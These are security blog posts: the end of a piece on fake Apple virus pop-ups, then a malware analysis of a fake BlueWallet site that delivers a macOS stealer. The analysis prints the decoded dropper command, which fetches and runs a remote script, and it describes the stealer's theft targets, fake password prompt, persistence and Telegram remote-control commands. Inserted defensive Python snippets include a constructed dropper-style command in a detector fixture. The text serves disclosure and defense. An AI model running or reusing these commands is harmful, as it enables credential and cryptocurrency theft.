Messages like this sometimes claim to be from your ISP, a “Security Department,” or a generic “Safety Center.”

“Apple Security Alert
8 viruses have been detected on your iPhone. Now iOS is damaged by 72%. Further damage to the system will result in device lockup and loss of all data within two minutes.
Please click the button below to remove all viruses.”

This is another fake warning, commonly used by scammers to trick users into clicking links or downloading unnecessary or harmful software. Apple doesn’t send alerts like this, and these messages use vague threats to get your attention.

What kind of app you’re really installing if you follow the instructions depends on your device and your location. If you’re “lucky,” it’s just adware, but you might just as easily end up with an infostealer.

In many cases, you’ll end up with fleeceware, a type of deceptive mobile app where developers lure users in with short free trials that quickly convert into hidden subscription fees, sometimes costing hundreds of dollars per month. These apps often offer some functionality to stay on the barely legal side of things, but at wildly inflated prices.

How to stay safe

The best response to these messages is simply to ignore them.

Real system alerts come from the OS, not from inside a game window or browser tab. Here’s a simple test: If you can switch apps and the “warning” disappears with the browser/game, it was not a system‑level alert.

Check the destination URLs before proceeding. Apple, Google, and major ISPs use predictable domains. A familiar-looking URL is not proof that a message is legitimate, but if the URL looks suspicious, it should definitely be treated as a scam.

You may arrive at something that looks like the official App Store or Google Play Store. Be wary of lookalike app stores and unofficial download sites, but if you are on the real store, the app is generally safer to install. However, it’s still worth checking reviews, permissions, and the developer before proceeding.

Visit the official website of the organization the message claims to be from and log in there. If there’s a genuine problem with your account, storage, or device, you’ll find information about it through official channels.

Use an up-to-date, real-time anti-malware solution on your devices that can detect and block malicious apps.

Categories: Malware Bytes

Fake BlueWallet steals passwords, accounts, and crypto from Macs

Mon, 06/01/2026 - 10:40am

A fake website impersonating BlueWallet (a real Bitcoin wallet) is targeting Mac users with a simple but effective attack. BlueWallet itself has not been compromised. Instead, cybercriminals have stolen the name and branding of the legitimate Bitcoin wallet to make a malicious download appear trustworthy.

If you went looking for a cryptocurrency wallet and landed on one of these fake BlueWallet download pages, the site tried to trick you into opening a downloaded file in a built-in macOS tool and pressing “Run.” If you followed those instructions, the malware could steal saved passwords, browser logins, cryptocurrency wallets, documents, and other sensitive data. It also watches the clipboard for cryptocurrency wallet addresses and can replace them with attacker-controlled addresses.

That last feature is particularly dangerous. If you copy a wallet address before sending funds, the malware can silently replace it with the attacker’s address. Everything looks normal on screen, but the money goes somewhere else.

Should you worry? Only if you downloaded and ran the file. Simply visiting the page and closing it does nothing on its own. The attack depends entirely on the user opening the script and pressing play.

If you did run it, treat the machine as compromised and follow the steps below.

What to do if you may have run it

If you opened the file and pressed play, assume your device was compromised and work through these steps:

  • Disconnect the machine from the network to cut the control channel
  • Run a full scan of the device, and make sure you’re using up-to-date security software with web protection enabled
  • From a different, trusted device, change passwords for any accounts used on the Mac, starting with email and cryptocurrency exchanges
  • Move any cryptocurrency to a new wallet created on a clean device
  • Treat existing seed phrases and keys as exposed
  • Before sending crypto in future, verify the full destination address character by character
  • Check for and remove unfamiliar files in ~/Library/LaunchAgents
  • Look for a hidden .sysupd.sh file in /tmp
  • Rotate cloud and SSH credentials if .ssh, .aws, or .gnupg files were present on the machine
  • When in doubt, back up your data and reinstall macOS from a known-good source rather than trying to clean in place

Social engineering tricks

The most interesting part of this campaign isn’t technical. The attackers didn’t break into the Mac or bypass Apple’s security protections. They persuaded victims to run the malware themselves.

The fake website walks users through the process with a convincing download page, simple instructions, and even a keyboard shortcut. The attack succeeds because the victim trusts what they are seeing.

As operating systems get better at blocking malicious software, attackers are increasingly investing in social engineering. Instead of finding ways around security controls, they convince people to click through them.

That’s why one habit is becoming increasingly important: Be suspicious of any download that arrives with instructions to open it in a scripting tool, developer utility, or Terminal window and press “Run.”

In this campaign, a single press of ⌘R was enough to turn a Mac into a password stealer, cryptocurrency wallet thief, clipboard hijacker, and remote access tool.

Technical analysis

Stage one: The AppleScript downloader

The page lives at update-bluewallet[.]com, a domain name close enough to the real wallet (bluewallet.io) to pass a quick glance. The first thing the page does is not wait for consent. Its script calls a download routine on a two-second timer the moment the page loads, and again if the visitor clicks either of two buttons.

The file that lands in the Downloads folder is named BlueWallet Installer.applescript, an extension most people have never seen and have no instinct to distrust.

Then the page does something quietly clever. After a short delay, it rewrites its own status text to read like setup instructions: open the installer, then press the play button or ⌘R. It even draws a small blue play triangle in the text so the wording matches the real Script Editor interface the victim is about to see.

The page walks the victim through the exact motions needed to run the file.

On modern macOS, an unsigned application downloaded from the web gets quarantined and checked before it can run. A plain script opened in Script Editor and executed by the user sidesteps that flow. The person is manually instructing a trusted Apple tool to run code, so there is no notarization gate to fail.

This is why the attacker chose an AppleScript instead of a packaged app: it moves the risky action out of the operating system’s hands and into the victim’s.

The AppleScript itself is remarkably short. Stripped of its decorative comments, including a fake version number and a line claiming to be a “Brew Install Upgrade,” it runs a single base64-encoded shell command and then tells Script Editor to quit without saving, removing the evidence from view.

Decoded, that command does this:

curl -s 'https://projects2026box[.]com/serve_site/confighelper_0adfeee8.sh' -o /tmp/.sysupd.sh && chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &

It fetches a second script from a remote host, saves it to a hidden file in the temp directory, makes it executable, and runs it in the background with all output suppressed.

The victim sees nothing. The filename .sysupd.sh is dressed up to look like a system update. This is a textbook staged dropper: stage one is tiny and disposable, and its only job is to fetch the real payload.

Stage two: Payload analysis

The first lines establish how the malware intends to operate. It sets umask 077 so everything it creates is readable only by the compromised user, then builds a hidden, randomly named working directory under /tmp seeded from /dev/urandom.

Its configuration is obfuscated, but weakly. A small function named _xd walks a hex string two characters at a time and XORs each byte against a hardcoded repeating key: swckR9JCD2Uu.

That function decodes the script’s Telegram bot token, chat identifier, secondary command token, and staging URL at runtime. It is enough to defeat tools that only search for plaintext strings, but not much more. Because the key and algorithm are both sitting in the file, every encoded value is fully recoverable.

One detail stands out: The decoded Telegram chat value and decoded command-and-control chat value are identical. The attacker is using a single Telegram channel as both the exfiltration drop and the control channel. It is cheap, scalable, encrypted, and blends into ordinary HTTPS traffic.
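Because the key and the algorithm both ship in the sample, recovering the configuration takes only a few lines. The following is an added example, not code from the sample or from Malwarebytes: it reimplements the hex-plus-repeating-XOR decoding described above with the key quoted in this article, then groups variables that decode to the same value, as the Telegram chat and command-and-control chat values do. The variable names, the shape of the `_xd` call, and every encoded value are constructed placeholders.

```python
import re
from itertools import cycle

# Hardcoded repeating key quoted in the article.
XOR_KEY = b"swckR9JCD2Uu"

# Assumed call shape inside the stage-two script: NAME="$(_xd <hex>)"
XD_CALL = re.compile(r"""^\s*(\w+)=.*?\b_xd\s+["']?([0-9A-Fa-f]+)["']?""", re.M)


def xd_decode(hex_string, key=XOR_KEY):
    """Walk the hex string one byte at a time and XOR it with the repeating key."""
    raw = bytes.fromhex(hex_string)
    return bytes(b ^ k for b, k in zip(raw, cycle(key)))


def extract_config(script_text, key=XOR_KEY):
    """Decode every _xd-wrapped value that yields printable ASCII."""
    config = {}
    for name, hex_string in XD_CALL.findall(script_text):
        if len(hex_string) % 2:
            continue  # odd length cannot be a whole number of bytes
        try:
            text = xd_decode(hex_string, key).decode("ascii")
        except UnicodeDecodeError:
            continue  # wrong key or not an encoded string
        if text.isprintable():
            config[name] = text
    return config


def shared_values(config):
    """Group variable names that decode to the same value."""
    groups = {}
    for name, value in config.items():
        groups.setdefault(value, []).append(name)
    return {value: names for value, names in groups.items() if len(names) > 1}


def encode_for_fixture(text, key=XOR_KEY):
    """XOR is symmetric, so the decoder also builds the constructed test data."""
    return xd_decode(text.encode().hex(), key).hex()


# Constructed placeholders; none of these values come from the real sample.
CONSTRUCTED_VALUES = {
    "BOT_TOKEN": "0000000000:CONSTRUCTED-PLACEHOLDER-TOKEN",
    "CHAT_ID": "-1000000000000",
    "C2_CHAT": "-1000000000000",
    "STAGE_URL": "https://staging.example.invalid/upload",
}
SAMPLE_SCRIPT = "\n".join(
    f'{name}="$(_xd {encode_for_fixture(value)})"'
    for name, value in CONSTRUCTED_VALUES.items()
)

if __name__ == "__main__":
    recovered = extract_config(SAMPLE_SCRIPT)
    for name, value in recovered.items():
        print(f"{name} = {value}")
    for value, names in shared_values(recovered).items():
        print(f"same value in {', '.join(names)}: {value}")
```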

Not everything is obfuscated. The clipboard-hijacking addresses are sitting in the file in plain text: a Bitcoin address, an Ethereum address, and a Solana address. These are the addresses the implant swaps in when it catches you copying a wallet address. Because they are public on their respective blockchains, they are also among the most useful artifacts in the whole sample.

What the malware steals

The second stage’s collection routines are sweeping. They pull from six broad categories.

1. Web browsers

The script extracts history, cookies, login data, and bookmarks from a wide range of browsers, including:

  • Chromium-based browsers: Google Chrome Stable, Beta, Canary, and Dev; Brave; Microsoft Edge; Vivaldi; Opera; Opera GX; Arc; Chromium; Coccoc; and Yandex
  • Firefox-based browsers: Firefox, Waterfox, Pale Moon, Zen, and LibreWolf
  • macOS native browser data: Safari cookies, history, and form values

2. Cryptocurrency wallets

This appears to be the script’s primary focus.

It targets desktop wallet applications including Electrum, Electrum-LTC, Exodus, Atomic Wallet, Ledger Live, Trezor Suite, Bitcoin Core, Litecoin Core, DashCore, Dogecoin Core, Coinomi, Monero, Sparrow, Armory, BlueWallet, Zengo, Trust Wallet, Binance Desktop, and Tonkeeper.

It also targets browser-extension wallets across several ecosystems:

  • Bitcoin: Xverse, Leather, UniSat, Alby, and Wizz
  • Solana: Phantom, Solflare, Backpack, Nightly, MagicEden, Sollet, and Slope
  • EVM wallets: MetaMask, Trust Wallet, OKX, Coinbase Wallet, Rabby, Zerion, Rainbow, SafePal, Bitget, Ronin, and XDEFI
  • Cosmos: Keplr, Station, and Cosmostation
  • Other ecosystems: Yoroi, Lace, Petra, Martian, Suiet, Talisman, SubWallet, Braavos, and Temple

3. Password managers and security tools

The malware targets local storage and settings for several password managers, including LastPass, 1Password, Dashlane, Bitwarden, Keeper, RoboForm, NordPass, Enpass, StickyPassword, TrueKey, Passbolt, and Buttercup.

It also looks for data associated with 2FA and authenticator tools, including Google Authenticator, Authy, Duo, Microsoft Authenticator, 2FAS, and FreeOTP.

4. Communication and social apps

The script attempts to copy session data and local storage for Telegram Desktop and Discord, including Discord Canary and Discord PTB.

5. Developer and cloud tools

It looks for credentials and configuration files in the user’s home directory, including:

  • AWS CLI configurations in .aws
  • SSH keys in .ssh
  • GnuPG keys in .gnupg
  • Kubernetes configs in .kube
  • Shell and Git files including .zshrc, .zsh_history, .bash_history, and .gitconfig

6. Productivity apps and general files

The script copies the local Apple Notes database, NoteStore.sqlite.

It also looks for browser-extension data related to shopping and productivity tools, including Honey, CapitalOne Shopping, Rakuten, CamelCamelCamel, Grammarly, Evernote, Notion Clipper, Todoist, and Google Keep.

Finally, it scans Desktop, Documents, and Downloads for files with extensions including .txt, .pdf, .docx, .doc, .rtf, .wallet, .key, .keys, .seed, .kdbx, .pem, and .env, under a size cap.

What it does with the stolen data

The malware tries to capture the user’s account password directly. An osascript dialog titled “System Preferences” asks the user to re-enter their password “to continue.” The script validates each attempt against dscl . authonly before saving it, so it only stops once it has a working credential.

For exfiltration, it archives the staged data with macOS’s own ditto, likely because it is always present, unlike zip. To stay under Telegram’s 50 MB upload limit, it breaks larger archives into 49 MB chunks with split before sending each part.

It establishes persistence by writing a LaunchAgent plist into the user’s ~/Library/LaunchAgents, backed by a hidden support directory, and loading it with launchctl so the implant runs again at every login.
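For the LaunchAgents check recommended earlier, here is an added triage example (not taken from the malware or from Malwarebytes tooling): it parses LaunchAgent plists and flags those that start a program from a hidden directory or from /tmp at login. The labels and paths in the sample plists are constructed, since this article does not give the implant's plist name.

```python
import plistlib
from pathlib import PurePosixPath


def path_arguments(agent):
    """Collect path-like strings from Program and ProgramArguments."""
    values = []
    if isinstance(agent.get("Program"), str):
        values.append(agent["Program"])
    args = agent.get("ProgramArguments")
    if isinstance(args, list):
        values.extend(a for a in args if isinstance(a, str))
    return [v for v in values if v.startswith(("/", "~"))]


def reasons_for(path):
    """Explain why a launch path deserves a closer look, if it does."""
    parts = PurePosixPath(path).parts
    reasons = []
    if any(p.startswith(".") and p not in (".", "..") for p in parts):
        reasons.append("hidden path component")
    if parts[:2] == ("/", "tmp") or parts[:3] == ("/", "private", "tmp"):
        reasons.append("runs from /tmp")
    return reasons


def triage(plist_bytes):
    """Return the agent label and a list of findings for one plist file."""
    try:
        agent = plistlib.loads(plist_bytes)
    except Exception:
        return {"label": None, "findings": ["unparseable plist"]}
    if not isinstance(agent, dict):
        return {"label": None, "findings": ["unexpected plist structure"]}
    findings = [
        f"{reason}: {path}"
        for path in path_arguments(agent)
        for reason in reasons_for(path)
    ]
    # RunAtLoad only matters once the launch path itself looks wrong.
    if findings and agent.get("RunAtLoad") is True:
        findings.append("starts at every login (RunAtLoad)")
    return {"label": agent.get("Label"), "findings": findings}


# Constructed samples: labels and paths are illustrative only.
SUSPECT_PLIST = plistlib.dumps({
    "Label": "com.example.constructed.updater",
    "ProgramArguments": ["/bin/bash", "/Users/victim/Library/.cache_support/agent.sh"],
    "RunAtLoad": True,
})
BENIGN_PLIST = plistlib.dumps({
    "Label": "com.example.constructed.sync",
    "ProgramArguments": ["/Applications/Sync.app/Contents/MacOS/sync-helper"],
    "RunAtLoad": True,
})

if __name__ == "__main__":
    for blob in (SUSPECT_PLIST, BENIGN_PLIST):
        result = triage(blob)
        print(result["label"], "->", result["findings"] or "nothing flagged")
```

On a real machine, feed it the bytes of each file in ~/Library/LaunchAgents; a finding is a prompt to inspect the file, not proof of infection.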

The clipboard hijack is a live background loop. A clip_watch function continuously inspects the clipboard, matches Bitcoin, Ethereum, and Solana address formats by regex, reports the original address to the command-and-control channel, and overwrites the clipboard with the attacker’s address via pbcopy.

That means the substitution happens silently between copy and paste.

Finally, the malware can be controlled interactively. A c2_loop polls the Telegram bot for commands and supports a full operator toolkit:

  • /info for system details
  • /exec for arbitrary shell commands
  • /clipboard to read current clipboard contents
  • /download to pull specific files
  • /exfil to rerun the theft module
  • /selfdestruct to wipe traces

This makes the Telegram channel a real-time remote-control link, not just a one-way drop.

Living off the land, and off Telegram

The pattern here is familiar and getting more common: lean on tools that are already trusted.

The delivery abuses Apple’s own Script Editor. The configuration hides behind a trivial XOR rather than packed binaries. The command channel rides Telegram’s Bot API, which can pass through egress filters that would flag an unknown server.

None of these pieces is novel on its own. The effectiveness comes from stacking legitimate-looking components so no single step trips an alarm.

Detection opportunities

The lessons here are less about the lure and more about the technique itself.

Script Editor executing a one-line base64 do shell script that immediately quits is a strong behavioral signal, and a far better detection target than the disposable stage-one file. So is a hidden /tmp/.sysupd.sh downloaded by curl and launched in the background.

Browsers and download surfaces could treat .applescript files arriving from the web with the same suspicion as executables. And Telegram remains an under-addressed command-and-control medium that bot-token abuse reporting could disrupt at the source.
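A static counterpart to the behavioral signal above, as an added example that is not part of the original analysis: it decodes base64 runs found on `do shell script` lines of an `.applescript` file and scores the decoded command for the stage-one traits described in this article. The sample script, its placeholder host, the wording of the quit statement, and the scoring threshold are assumptions; the decode-and-run wrapper is deliberately left out of the sample.

```python
import base64
import binascii
import re

# A base64 run long enough to hold a shell command.
B64_RUN = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Assumed wording of the "quit without saving" step; the article gives no exact text.
QUITS_EDITOR = re.compile(r'tell\s+application\s+"Script Editor"\s+to\s+quit', re.I)

# Traits of the decoded stage-one command described in the article.
TRAITS = {
    "downloads_with_curl": re.compile(r"\bcurl\b[^|;&]*\s-o\s"),
    "hidden_file_in_tmp": re.compile(r"/tmp/\.[\w.-]+"),
    "marks_executable": re.compile(r"\bchmod\s+\+x\b"),
    "suppresses_output": re.compile(r">\s*/dev/null\s+2>&1"),
    "runs_in_background": re.compile(r"(?<![&>])&\s*$"),
}


def decode_blobs(script_text):
    """Return the decoded text of every base64 run on a `do shell script` line."""
    decoded = []
    for line in script_text.splitlines():
        if "do shell script" not in line.lower():
            continue
        for blob in B64_RUN.findall(line):
            try:
                text = base64.b64decode(blob, validate=True).decode("utf-8")
            except (binascii.Error, UnicodeDecodeError):
                continue  # not base64, or not text once decoded
            if text.isprintable():
                decoded.append(text)
    return decoded


def analyze(script_text):
    """Score an AppleScript source file for the stage-one dropper pattern."""
    decoded = decode_blobs(script_text)
    traits = sorted(
        {name for cmd in decoded for name, rx in TRAITS.items() if rx.search(cmd)}
    )
    quits = bool(QUITS_EDITOR.search(script_text))
    # Assumed threshold: three traits, or two plus the self-closing editor.
    suspicious = len(traits) >= 3 or (len(traits) >= 2 and quits)
    return {
        "decoded": decoded,
        "traits": traits,
        "quits_editor": quits,
        "verdict": "suspicious" if suspicious else "clean",
    }


def as_b64(text):
    return base64.b64encode(text.encode()).decode()


# Constructed samples. The host is a placeholder; /tmp/.sysupd.sh is from the article.
CONSTRUCTED_CMD = (
    "curl -s 'https://stage2.example.invalid/helper.sh' -o /tmp/.sysupd.sh "
    "&& chmod +x /tmp/.sysupd.sh && /tmp/.sysupd.sh >/dev/null 2>&1 &"
)
SAMPLE_DROPPER = (
    "-- Brew Install Upgrade (constructed decoy comment)\n"
    f'do shell script "[decode-and-run wrapper omitted] {as_b64(CONSTRUCTED_CMD)}"\n'
    'tell application "Script Editor" to quit saving no\n'
)
BENIGN_TEXT = "echo build finished without errors on the release branch"
BENIGN_B64 = f'do shell script "[wrapper omitted] {as_b64(BENIGN_TEXT)}"\n'
BENIGN_PLAIN = 'do shell script "ls ~/Documents"\n'

if __name__ == "__main__":
    for name in ("SAMPLE_DROPPER", "BENIGN_B64", "BENIGN_PLAIN"):
        result = analyze(globals()[name])
        print(f"{name}: {result['verdict']} {result['traits']}")
```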

Indicators of Compromise

File hashes (SHA-256)

  • 216277bdb7998b48852024fc8b5853c3dc50b3857fd22afd1320b884bcaa0a61 (BlueWallet Installer.applescript)

Network indicators

  • update-bluewallet[.]com
  • projects2026box[.]com

Clipboard-hijack addresses

  • BTC: bc1qrmj4ggshddhnxx3rxwvsu8pe9ut6cgx8mx364e
  • ETH: 0x2B871703122064e45d77146a6D5203da3bD192FA
  • SOL: 8dtdRQePrKz97FszwMEa4QvptdAAcbAFs7kBojr5Mz3v

Categories: Malware Bytes
